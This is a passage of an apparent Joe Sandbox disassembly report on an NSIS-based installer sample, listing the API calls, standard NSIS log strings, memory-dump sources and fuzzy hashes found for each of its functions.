                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                          • String ID: BasicsCommunication$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                          • API String ID: 4286501637-3321519224
                                          • Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                          • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                          • Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                          • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

                                          Control-flow Graph

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 00403598
                                          • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                            • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                            • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                          • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                          Strings
                                          • Error launching installer, xrefs: 004035D7
                                          • soft, xrefs: 00403675
                                          • Null, xrefs: 0040367E
                                          • Inst, xrefs: 0040366C
                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                          • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                          • API String ID: 4283519449-527102705
                                          • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                          • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                          • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                          • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

                                          Control-flow Graph

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 004033E7
                                          • GetTickCount.KERNEL32 ref: 00403464
                                          • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                          • wsprintfW.USER32 ref: 004034A4
                                          • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                          • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: CountFileTickWrite$wsprintf
                                          • String ID: ... %d%%$P1B$X1C$X1C
                                          • API String ID: 651206458-1535804072
                                          • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                          • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                          • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                          • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

                                          Control-flow Graph

                                          APIs
                                          • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                          • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                          • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                          • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                          • String ID:
                                          • API String ID: 2740478559-0
                                          • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                          • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                          • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                          • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                          • GlobalFree.KERNELBASE(00617D50), ref: 00402387
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: FreeGloballstrcpyn
                                          • String ID: BasicsCommunication$Exch: stack < %d elements$Pop: stack empty$P}a
                                          • API String ID: 1459762280-2131738396
                                          • Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                          • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                          • Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                          • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

                                          Control-flow Graph

                                          control_flow_graph 766 4022fd-402325 call 40145c GetFileVersionInfoSizeW 769 4030e3-4030f2 766->769 770 40232b-402339 GlobalAlloc 766->770 770->769 771 40233f-40234e GetFileVersionInfoW 770->771 773 402350-402367 VerQueryValueW 771->773 774 402384-40238d GlobalFree 771->774 773->774 777 402369-402381 call 405f51 * 2 773->777 774->769 777->774
                                          APIs
                                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                          • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                          • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                          • GlobalFree.KERNELBASE(00617D50), ref: 00402387
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                          • String ID:
                                          • API String ID: 3376005127-0
                                          • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                          • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                          • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                          • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

                                          Control-flow Graph

                                          control_flow_graph 782 402b23-402b37 GlobalAlloc 783 402b39-402b49 call 401446 782->783 784 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 782->784 789 402b70-402b73 783->789 784->789 790 402b93 789->790 791 402b75-402b8d call 405f6a WriteFile 789->791 792 4030e3-4030f2 790->792 791->790 796 402384-40238d GlobalFree 791->796 796->792
                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                          • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                          • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                          • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                          • String ID:
                                          • API String ID: 2568930968-0
                                          • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                          • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                          • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                          • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

                                          Control-flow Graph

                                          control_flow_graph 799 402713-40273b call 406009 * 2 804 402746-402749 799->804 805 40273d-402743 call 40145c 799->805 807 402755-402758 804->807 808 40274b-402752 call 40145c 804->808 805->804 809 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 807->809 810 40275a-402761 call 40145c 807->810 808->807 810->809
                                          APIs
                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: PrivateProfileStringWritelstrcpyn
                                          • String ID: <RM>$BasicsCommunication$WriteINIStr: wrote [%s] %s=%s in %s
                                          • API String ID: 247603264-1988542485
                                          • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                          • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                          • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                          • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

                                          Control-flow Graph

                                          control_flow_graph 906 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 917 402223-4030f2 call 4062a3 906->917 918 40220d-40221b call 4062a3 906->918 918->917
                                          APIs
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                          • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          Strings
                                          • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                          • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                          • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                          • API String ID: 3156913733-2180253247
                                          • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                          • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                          • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                          • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                          APIs
                                          • GetTickCount.KERNEL32 ref: 00405E9D
                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: CountFileNameTempTick
                                          • String ID: nsa
                                          • API String ID: 1716503409-2209301699
                                          • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                          • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                          • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                          • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                          APIs
                                          • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: Window$EnableShowlstrlenwvsprintf
                                          • String ID: HideWindow
                                          • API String ID: 1249568736-780306582
                                          • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                          • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                          • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                          • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                          • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                          • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                          • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                          • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                          • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                          • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                          • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                          • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                          • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
